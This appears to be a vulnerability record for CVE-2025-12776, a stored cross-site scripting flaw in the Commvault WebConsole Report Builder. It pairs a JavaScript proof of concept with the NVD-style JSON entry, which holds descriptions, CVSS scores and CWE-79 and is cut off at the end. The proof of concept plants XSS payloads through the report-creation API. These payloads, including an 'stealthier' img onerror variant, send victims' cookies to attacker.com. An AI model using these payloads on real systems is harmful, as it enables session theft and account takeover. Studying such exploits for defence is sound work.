CVE-2025-12776

// CVE-2025-12776 PoC - Stored XSS in Commvault WebConsole Report Builder // This PoC demonstrates how to inject malicious JavaScript through the Report Builder // Step 1: Create a malicious report with XSS payload const maliciousPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; // Step 2: Send the malicious report creation request fetch('https://target.com/webconsole/api/reportbuilder/reports', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <attacker_token>' }, body: JSON.stringify({ reportName: maliciousPayload, description: 'Test Report', dataSource: 'test' }) }); // Step 3: When a user with edit permissions modifies the report, // the XSS payload will be executed in their browser context // Alternative: Use event handlers for stealthier XSS const stealthPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">';

{"cve": {"id": "CVE-2025-12776", "sourceIdentifier": "050066fd-a2f9-4f32-ab5d-4c53f48bc333", "published": "2026-01-07T22:15:43.030", "lastModified": "2026-02-02T19:32:01.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Report Builder component of the application stores user input directly in a web page and displays it to other users, which raised concerns about a possible Cross-Site Scripting (XSS) attack. Proper management of this functionality helps ensure a secure and seamless user experience.  Although the user input is not validated in the report creation, these scripts are not executed when the report is run by end users. The script is executed when the report is modified through the report builder by a user with edit permissions. \n\n\n\n\nThe Report Builder is part of the WebConsole.  The WebConsole package is currently end of life, and is no longer maintained. We strongly recommend against installing or using it in any production environment. However, if you choose to install it, for example, to access functionality like the Report Builder, it must be deployed within a fully isolated network that has no access to sensitive data or internet connectivity. This is a critical security precaution, as the retired package may contain unpatched vulnerabilities and is no longer supported with updates or fixes."}, {"lang": "es", "value": "El componente Report Builder de la aplicación almacena la entrada del usuario directamente en una página web y la muestra a otros usuarios, lo que generó preocupaciones sobre un posible ataque de cross-site scripting (XSS). La gestión adecuada de esta funcionalidad ayuda a garantizar una experiencia de usuario segura y sin interrupciones. Aunque la entrada del usuario no se valida en la creación del informe, estos scripts no se ejecutan cuando el informe es ejecutado por los usuarios finales. El script se ejecuta cuando el informe es modificado a través del report builder por un usuario con permisos de edición.\n\nEl Report Builder es parte de la WebConsole. El paquete WebConsole se encuentra actualmente en fin de vida útil y ya no recibe mantenimiento. Desaconsejamos encarecidamente instalarlo o usarlo en cualquier entorno de producción. Sin embargo, si elige instalarlo, por ejemplo, para acceder a funcionalidades como el Report Builder, debe implementarse dentro de una red completamente aislada que no tenga acceso a datos sensibles ni a conectividad a internet. Esta es una precaución de seguridad crítica, ya que el paquete retirado puede contener vulnerabilidades sin parchear y ya no recibe soporte con actualizaciones o correcciones."}], "metrics": {"cvssMetricV40": [{"source": "050066fd-a2f9-4f32-ab5d-4c53f48bc333", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "050066fd-a2f9-4f32-ab5d-4c53f48bc333", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:co ... (truncated)